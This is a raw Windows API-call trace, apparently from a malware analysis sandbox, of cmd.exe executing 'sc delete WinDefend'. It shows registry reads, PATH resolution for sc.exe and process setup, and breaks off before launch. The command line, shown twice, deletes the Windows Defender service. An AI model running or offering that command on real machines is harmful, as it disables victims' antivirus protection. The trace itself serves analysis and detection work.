	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x40, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x40, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x40, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.275] RegCloseKey (hKey=0x40) returned 0x0
	[0027.275] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2bed64 | out: phkResult=0x2bed64*=0x40) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x40, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x1, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x1, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x0, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x9, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x9, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.275] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x9, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.275] RegCloseKey (hKey=0x40) returned 0x0
	[0027.275] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf20
	[0027.275] srand (_Seed=0x5cdadf20) 
	[0027.275] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0027.275] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	[0027.275] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.276] GetProcessHeap () returned 0x390000
	[0027.276] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a0288
	[0027.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a0290, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0027.276] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.276] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0027.276] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0027.276] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0027.276] GetProcessHeap () returned 0x390000
	[0027.276] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a0bc8 | out: hHeap=0x390000) returned 1
	[0027.277] GetEnvironmentStringsW () returned 0x3a04a0*
	[0027.277] GetProcessHeap () returned 0x390000
	[0027.277] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x94a) returned 0x3a27a0
	[0027.277] FreeEnvironmentStringsW (penv=0x3a04a0) returned 1
	[0027.277] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0027.277] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.277] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0027.277] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0027.277] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0027.277] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0027.277] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0027.277] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0027.277] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0027.277] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0027.277] GetProcessHeap () returned 0x390000
	[0027.277] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x44) returned 0x3907f0
	[0027.277] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bfb30 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.277] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x104, lpBuffer=0x2bfb30, lpFilePart=0x2bfb2c | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2bfb2c*="Desktop") returned 0x1d
	[0027.277] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
	[0027.278] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2bf8ac | out: lpFindFileData=0x2bf8ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3a0118
	[0027.278] FindClose (in: hFindFile=0x3a0118 | out: hFindFile=0x3a0118) returned 1
	[0027.278] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2bf8ac | out: lpFindFileData=0x2bf8ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x3a0118
	[0027.278] FindClose (in: hFindFile=0x3a0118 | out: hFindFile=0x3a0118) returned 1
	[0027.278] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0027.278] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", lpFindFileData=0x2bf8ac | out: lpFindFileData=0x2bf8ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3a0118
	[0027.278] FindClose (in: hFindFile=0x3a0118 | out: hFindFile=0x3a0118) returned 1
	[0027.278] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
	[0027.278] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 1
	[0027.279] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\Desktop") returned 1
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a27a0 | out: hHeap=0x390000) returned 1
	[0027.279] GetEnvironmentStringsW () returned 0x3a04a0*
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x98e) returned 0x3a1e48
	[0027.279] FreeEnvironmentStringsW (penv=0x3a04a0) returned 1
	[0027.279] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3907f0 | out: hHeap=0x390000) returned 1
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400e) returned 0x3a3a90
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x34) returned 0x3a0118
	[0027.279] GetProcessHeap () returned 0x390000
	[0027.279] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a3a90 | out: hHeap=0x390000) returned 1
	[0027.279] GetConsoleOutputCP () returned 0x1b5
	[0027.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.280] GetUserDefaultLCID () returned 0x409
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a074950, cchData=8 | out: lpLCData=":") returned 2
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bfc70, cchData=128 | out: lpLCData="0") returned 2
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bfc70, cchData=128 | out: lpLCData="0") returned 2
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bfc70, cchData=128 | out: lpLCData="1") returned 2
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a074940, cchData=8 | out: lpLCData="/") returned 2
	[0027.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a074d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a074d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a074d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a074cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a074c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a074c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a074c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a074930, cchData=8 | out: lpLCData=".") returned 2
	[0027.281] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a074920, cchData=8 | out: lpLCData=",") returned 2
	[0027.281] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0027.282] GetProcessHeap () returned 0x390000
	[0027.282] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x20c) returned 0x3a2818
	[0027.282] GetConsoleTitleW (in: lpConsoleTitle=0x3a2818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.340] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.340] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0027.340] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0027.340] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0027.340] GetProcessHeap () returned 0x390000
	[0027.340] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3a3a90
	[0027.340] GetProcessHeap () returned 0x390000
	[0027.340] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a3a90 | out: hHeap=0x390000) returned 1
	[0027.340] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0027.341] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0027.341] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0027.341] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0027.341] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0027.341] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0027.341] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0027.341] GetProcessHeap () returned 0x390000
	[0027.341] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x58) returned 0x3a2a30
	[0027.341] GetProcessHeap () returned 0x390000
	[0027.341] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe) returned 0x39d5e0
	[0027.341] GetProcessHeap () returned 0x390000
	[0027.341] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x2c) returned 0x3a2a90
	[0027.342] GetConsoleTitleW (in: lpConsoleTitle=0x2bf968, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.342] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0027.342] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0027.342] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0027.342] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0027.342] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0027.342] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0027.342] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0027.342] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0027.342] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0027.342] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0027.342] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0027.342] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0027.342] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0027.342] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0027.343] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0027.343] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0027.343] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0027.343] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0027.343] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0027.343] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0027.343] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0027.343] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0027.343] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0027.343] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0027.343] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0027.343] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0027.343] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0027.343] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0027.343] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0027.343] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0027.343] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0027.343] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0027.343] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0027.343] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0027.343] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0027.343] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0027.343] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0027.343] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0027.343] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0027.343] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0027.343] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0027.343] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0027.343] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0027.343] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0027.343] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0027.343] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0027.344] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0027.344] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0027.344] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0027.344] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0027.344] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0027.344] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0027.344] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0027.344] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0027.344] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0027.344] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0027.344] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0027.344] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0027.344] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0027.344] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0027.344] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0027.344] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0027.344] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0027.344] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0027.344] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0027.344] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0027.344] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0027.344] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0027.344] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0027.344] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0027.344] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0027.344] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0027.344] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0027.344] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0027.344] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0027.344] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0027.344] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0027.344] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0027.344] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0027.344] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0027.344] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0027.344] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a2ac8
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x32) returned 0x3a2ce0
	[0027.345] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x418) returned 0x3907f0
	[0027.345] SetErrorMode (uMode=0x0) returned 0x0
	[0027.345] SetErrorMode (uMode=0x1) returned 0x0
	[0027.345] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3907f8, lpFilePart=0x2bf488 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2bf488*="Desktop") returned 0x1d
	[0027.345] SetErrorMode (uMode=0x0) returned 0x1
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3907f0, Size=0x4a) returned 0x3907f0
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3907f0) returned 0x4a
	[0027.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.345] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x158) returned 0x3a2d20
	[0027.345] GetProcessHeap () returned 0x390000
	[0027.345] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x2a8) returned 0x390848
	[0027.356] GetProcessHeap () returned 0x390000
	[0027.356] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x390848, Size=0x15a) returned 0x390848
	[0027.356] GetProcessHeap () returned 0x390000
	[0027.356] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x390848) returned 0x15a
	[0027.356] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.356] GetProcessHeap () returned 0x390000
	[0027.356] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe0) returned 0x3a2e80
	[0027.356] GetProcessHeap () returned 0x390000
	[0027.356] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a2e80, Size=0x76) returned 0x3a2e80
	[0027.356] GetProcessHeap () returned 0x390000
	[0027.356] RtlSizeHeap (HeapHandle=0x390000, Flags=0x0, MemoryPointer=0x3a2e80) returned 0x76
	[0027.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.357] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0xffffffff
	[0027.357] GetLastError () returned 0x2
	[0027.357] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0xffffffff
	[0027.357] GetLastError () returned 0x2
	[0027.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.357] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0xffffffff
	[0027.358] GetLastError () returned 0x2
	[0027.358] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\sc", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0xffffffff
	[0027.358] GetLastError () returned 0x2
	[0027.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0x3a2f00
	[0027.358] GetProcessHeap () returned 0x390000
	[0027.358] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x14) returned 0x3a2f40
	[0027.358] FindClose (in: hFindFile=0x3a2f00 | out: hFindFile=0x3a2f00) returned 1
	[0027.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0xffffffff
	[0027.359] GetLastError () returned 0x2
	[0027.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x2bf204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf204) returned 0x3a2f00
	[0027.359] GetProcessHeap () returned 0x390000
	[0027.359] RtlReAllocateHeap (Heap=0x390000, Flags=0x0, Ptr=0x3a2f40, Size=0x4) returned 0x3a2f40
	[0027.359] FindClose (in: hFindFile=0x3a2f00 | out: hFindFile=0x3a2f00) returned 1
	[0027.359] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0027.359] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0027.359] GetConsoleTitleW (in: lpConsoleTitle=0x2bf6fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.359] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf584, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf64c | out: lpAttributeList=0x2bf584, lpSize=0x2bf64c) returned 1
